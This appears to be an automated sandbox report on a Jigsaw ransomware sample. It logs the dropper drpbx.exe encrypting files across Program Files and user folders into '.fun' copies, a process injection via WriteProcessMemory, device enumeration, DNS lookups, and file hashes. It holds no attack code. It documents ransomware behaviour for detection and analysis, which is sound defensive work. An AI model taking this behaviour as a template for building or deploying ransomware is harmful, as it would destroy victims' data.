File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-48_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-125_contrast-high.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\offer_cards\credit-illustration.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_altform-lightunplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\protect_poster.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-32.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Generic-Dark.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\WideTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_connect.targetsize-48.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MicrosoftLogo.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\bun.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\PlayStore_icon.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\LibrarySquare150x150Logo.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-30_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ru_135x40.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_48.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4308 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
PID 4308 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

Processes

C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/4308-0-0x00007FFA10695000-0x00007FFA10696000-memory.dmp

memory/4308-1-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/4308-2-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/4308-3-0x0000000000FC0000-0x0000000000FF8000-memory.dmp

memory/4308-4-0x000000001BC70000-0x000000001C13E000-memory.dmp

memory/4308-5-0x000000001C140000-0x000000001C1DC000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/2700-20-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/4308-19-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/2700-21-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/2700-22-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/2700-23-0x0000000001B20000-0x0000000001B28000-memory.dmp

memory/2700-24-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{7F749844-947B-4478-8F9D-D28653FCFB29} - OProcSessId.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun

MD5 829165ca0fd145de3c2c8051b321734f
SHA1 f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e
SHA256 a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356
SHA512 7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb

C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun

MD5 f22599af9343cac74a6c5412104d748c
SHA1 e2ac4c57fa38f9d99f3d38c2f6582b4334331df5
SHA256 36537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65
SHA512 5c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727662143668243.txt.fun

MD5 7887b5998e6e945cada0040b3675e122
SHA1 70cae4fcb1b29370affbc7d3348f417e461371e0
SHA256 2d3424af197d1c1af41137138c9069c73f29dbf0a7fe05bca984a6baa0560177
SHA512 cded9c10eeb2d678708a9d5e6b5ec2480ed1efc3949b11138498ec997f3cde92c44d538074ef6db1b128cc1d53ad5ea7456f75ddb36f3d730de12181cfdbf38d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727663723895380.txt.fun

MD5 9445a004b034d04ad52da34823263511
SHA1 c322862db0094359fb272d1c90d5158ea26a032a
SHA256 a94334d04a574d8bb9427c7bab51e37b5d2dd7c8e8edde4ba746989c66acd891
SHA512 bfb9e07e12e04951deb52f452f2552bbf8be7993cf89544bbdeacbb55d333887e9452abc46cd8a42e10198d327e25aa29227c2c352790bcfb0263795366a2382

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727668321811013.txt.fun

MD5 dedc5834c706443bf68662061cc201bf
SHA1 ef07bd5859fb285b9fa82ab09eec519348cd8556
SHA256 50549eb84cca8a7b9f59240e97222ffe202f822e6d69fa7914f9bd8b1ba3a0bc
SHA512 ff7214f5455dae290f543e65ca3da77e01d0aee816911be62c0cce465886e170628e170fa32fe65666b505bea514ef3f5bbf529aca20479ebefd103febf5f125

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727706484274390.txt.fun

MD5 d667a92c01f6eb2f07204f6fb3be13c7
SHA1 bfe7efc41e09cfc44f719659c3d10fecc3ad9fe9
SHA256 f463d025193cb1b5884413819c07cd49e651c46149649df779d72720a904b1d4
SHA512 e4e51c6f547164cf10dd6ce8570df953f4aa25d1e02b703722404e63c661d0a9f642b1b2bba87ddba0f2309f7dd48d0c168677b4e136b5f0adead8b51c2898b7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun

MD5 75a585c1b60bd6c75d496d3b042738d5
SHA1 02c310d7bf79b32a43acd367d031b6a88c7e95ed
SHA256 5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834
SHA512 663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun

MD5 880833ad1399589728c877f0ebf9dce0
SHA1 0a98c8a78b48c4b1b4165a2c6b612084d9d26dce
SHA256 7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27
SHA512 0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun

MD5 409a8070b50ad164eda5691adf5a2345
SHA1 e84e10471f3775d5d706a3b7e361100c9fbfaf74
SHA256 a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796
SHA512 767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun

MD5 2884524604c89632ebbf595e1d905df9
SHA1 b6053c85110b0364766e18daab579ac048b36545
SHA256 ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f
SHA512 0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun

MD5 e092d14d26938d98728ce4698ee49bc3
SHA1 9f8ee037664b4871ec02ed6bba11a5317b9e784a
SHA256 5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb
SHA512 b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun

MD5 65368c6dd915332ad36d061e55d02d6f
SHA1 fb4bc0862b192ad322fcb8215a33bd06c4077c6b
SHA256 6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f
SHA512 8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun

MD5 0d35b2591dc256d3575b38c748338021
SHA1 313f42a267f483e16e9dd223202c6679f243f02d
SHA256 1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa
SHA512 f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun

MD5 433755fcc2552446eb1345dd28c924eb
SHA1 23863f5257bdc268015f31ab22434728e5982019
SHA256 d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b
SHA512 de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun

MD5 781ed8cdd7186821383d43d770d2e357
SHA1 99638b49b4cfec881688b025467df9f6f15371e8
SHA256 a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4
SHA512 87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun

MD5 72269cd78515bde3812a44fa4c1c028c
SHA1 87cada599a01acf0a43692f07a58f62f5d90d22c
SHA256 7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7
SHA512 3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun

MD5 7dbb12df8a1a7faae12a7df93b48a7aa
SHA1 07800ce598bee0825598ad6f5513e2ba60d56645
SHA256 aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77
SHA512 96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun

MD5 eda4add7a17cc3d53920dd85d5987a5f
SHA1 863dcc28a16e16f66f607790807299b4578e6319
SHA256 97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2
SHA512 d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun

MD5 82a2e835674d50f1a9388aaf1b935002
SHA1 e09d0577da42a15ec1b71a887ff3e48cfbfeff1a
SHA256 904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb
SHA512 b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun

MD5 150c9a9ed69b12d54ada958fcdbb1d8a
SHA1 804c540a51a8d14c6019d3886ece68f32f1631d5
SHA256 2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43
SHA512 70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun

MD5 ad091690b979144c795c59933373ea3f
SHA1 5d9e481bc96e6f53b6ff148b0da8417f63962ada
SHA256 7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1
SHA512 23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun

MD5 2de4e157bf747db92c978efce8754951
SHA1 c8d31effbb9621aefac55cf3d4ecf8db5e77f53d
SHA256 341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9
SHA512 3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun

MD5 be26a499465cfbb09a281f34012eada0
SHA1 b8544b9f569724a863e85209f81cd952acdea561
SHA256 9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5
SHA512 28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun

MD5 0c680b0b1e428ebc7bff87da2553d512
SHA1 f801dedfc3796d7ec52ee8ba85f26f24bbd2627c
SHA256 9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750
SHA512 2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun

MD5 6e333be79ea4454e2ae4a0649edc420d
SHA1 95a545127e10daea20fd38b29dcc66029bd3b8bc
SHA256 112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36
SHA512 bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun

MD5 b8454390c3402747f7c5e46c69bea782
SHA1 e922c30891ff05939441d839bfe8e71ad9805ec0
SHA256 76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d
SHA512 22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun

MD5 3ae8789eb89621255cfd5708f5658dea
SHA1 6c3b530412474f62b91fd4393b636012c29217df
SHA256 7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a
SHA512 f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun

MD5 b7c62677ce78fbd3fb9c047665223fea
SHA1 3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8
SHA256 aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2
SHA512 9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun

MD5 117d6f863b5406cd4f2ac4ceaa4ba2c6
SHA1 5cac25f217399ea050182d28b08301fd819f2b2e
SHA256 73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362
SHA512 e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun

MD5 51da980061401d9a49494b58225b2753
SHA1 3445ffbf33f012ff638c1435f0834db9858f16d3
SHA256 3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44
SHA512 ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun

MD5 2863e8df6fbbe35b81b590817dd42a04
SHA1 562824deb05e2bfe1b57cd0abd3fc7fbec141b7c
SHA256 7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad
SHA512 7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun

MD5 79f6f006c95a4eb4141d6cedc7b2ebeb
SHA1 012ca3de08fb304f022f4ea9565ae465f53ab9e8
SHA256 e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e
SHA512 c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun

MD5 b88e3983f77632fa21f1d11ac7e27a64
SHA1 03a2b008cc3fe914910b0250ed4d49bd6b021393
SHA256 8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5
SHA512 5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun

MD5 f77086a1d20bca6ba75b8f2fef2f0247
SHA1 db7c58faaecd10e4b3473b74c1277603a75d6624
SHA256 cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d
SHA512 a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun

MD5 e03c9cd255f1d8d6c03b52fee7273894
SHA1 d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e
SHA256 22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6
SHA512 d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac

